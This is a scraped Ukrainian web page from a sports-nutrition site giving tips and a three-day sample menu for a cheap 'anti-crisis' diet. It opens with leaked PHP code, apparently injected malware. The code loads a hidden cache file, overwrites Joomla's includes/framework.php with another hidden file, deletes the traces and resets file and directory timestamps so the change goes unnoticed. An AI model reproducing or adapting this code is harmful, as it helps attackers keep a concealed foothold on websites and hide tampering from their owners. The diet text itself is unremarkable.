$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Антикризова дієта | Спортивне харчування - успіх у бодібілдингу та пауерліфтингу

Антикризова дієта

anticrisisЦя дієта допоможе зберегти форму не тільки тобі, але й твоєму гаманцю.

Відомо що дієти часто обходяться дорожче в фінансову плані чим звичний режим харчування . Зараз саме час замінити стару марнотратну і шкідливу дієту на економічну і здорову. Результати ти помітиш вже через кілька місяців: ти зможеш не лише скинути зайву вагу і очистити свій організм від шлаків, а й позбутися від депресії. Головний сенс кризової дієти полягає в заміні складних і дорогих, а часом і шкідливих продуктів харчування на прості, дешеві та корисні.

1. Почни їсти кашу. Цей продукт найсприятливішим чином позначиться і на тобі, і на твоєму бюджеті. Не обмежуйся тільки рисовою та гречаною, урізноманітнити свій раціон різними видами каш: вівсяною, пшоняною, перловою, пшеничною, ячною, гороховою і т.д.

2. Відкрий для себе овочі
. Хай твоє харчування стане наполовину вегетаріанським, зате фігура буде викликати заздрість у оточуючих. Готуй рагу і салати з самих різних овочів і трав: літо - найкраща пора для таких експериментів.

3. Заміни ковбасні вироби свіжим м'ясом. Може бути, твоєму гаманцю від цього користь буде не найбільша, зате для твого організму цілком відчутна. Краще вибирати курячу грудку - білка в ній вдвічі більше, ніж, наприклад, у свинині, а коштує дешевше. Від напівфабрикатів теж варто відмовитися: заплативши за них відносно високу ціну, ти не можеш гарантувати настільки ж високу якість продукту.

4. Купуй тільки свіжі натуральні продукти. Замість супермаркету за продуктами краще сходити на ринок. Ти сама здивуєшся, наскільки більш економічно вигідним, і в той же час якісним стане твоє харчування.

5. Відмовся від надмірностей. Чіпси, сухарики, сушені кальмари - шкоди від них набагато більше, ніж користі. Тож чи варто на це витрачати гроші? А замість того, щоб кожен день купувати вершкове масло, купи кілька пляшок рослинного (не тільки соняшникової, а й оливкової, льняної, з гарбузового насіння і т.д.), яких тобі вистачить на довгий час.

Варіант меню: (це не догма, а простий зразок для приклада)

День перший

Сніданок: вівсяна каша, домашній кисіль з ягід, 1 варене яйце.
Обід: овочевий суп, велика порція салату із зелених овочів, зелений чай.
Вечеря: 200 г курячої грудки з гарніром з овочів, приготованих на пару, компот із сухофруктів.

День другий

Сніданок: перлова каша, чорний чай з молоком.
Обід: рагу з червоної квасолі та овочів, 1 яблуко, компот із сухофруктів.
Вечеря: 150 г сиру, зелений салат.

День третій

Сніданок: гречана каша, зелений чай з ложкою варення.
Обід: борщ, заправлений молоком, 1 яблуко, зелений чай.
Вечеря: суп зі шпинату, 1 варене яйце.

 
Ефективні дієти Антикризова дієта